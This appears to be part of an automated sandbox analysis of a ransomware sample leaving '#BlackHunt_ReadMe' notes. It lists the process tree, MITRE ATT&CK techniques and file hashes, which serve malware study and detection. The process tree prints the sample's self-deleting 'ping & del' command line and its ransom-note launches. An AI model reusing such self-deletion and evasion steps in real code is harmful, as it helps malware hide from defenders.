C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:1996
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3484
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2744
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe"2⤵
- Deletes itself
PID:3088 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3848
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3000
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2768
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
6Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b935ab674a3b77a75a5ca78f909b7193
SHA124edd9dcb341227fc65318a90adada0ff0242d23
SHA2560fbece33a0e2514df020283d4b40fdcd3362bedcaf6da52e308a0c0acaeaff4b
SHA5128d1c8f24514f84df42ef64e79ddc6aa38c1f85d35629243b2e45c3c8f5ea110c9dc6b7a7d15885fc9b4dfa196e8ae59a098fd84a1e759b630031213169fd792f
-
Filesize
12KB
MD5d59bfed46f20e35a83ef6d35ef2ba167
SHA1456e751582f4b35be621e0bc4394ea4fc818f54c
SHA25663f836b52cc288a7429466b431dbe76d1ec8445235aeaabcccfbc7eb00770cf2
SHA51289ca58ececbea55d21aa679993fe75cdad7ffb1fd2b77b889374641c0eacf03f29667167530699414c9f4a46889686674ea492c8f2d221020387b08602562bbf
-
Filesize
684B
MD533ed29f17aa7f9b22d508ee580158df2
SHA1a4b4d960159658bb57b64be620851e304f873e4f
SHA2569cccdf98e0441006695bd61f00808d69ddb043259521c4cbb9c7992d2a470ae7
SHA512f345b9c93b1360a0660d5fef66c17805aaefe826b089cb3ea87d039cb360592b96e45c41b55b7493502ec8a95e97f3e99ca67ffce4ca7799e02c3bc04d7b642a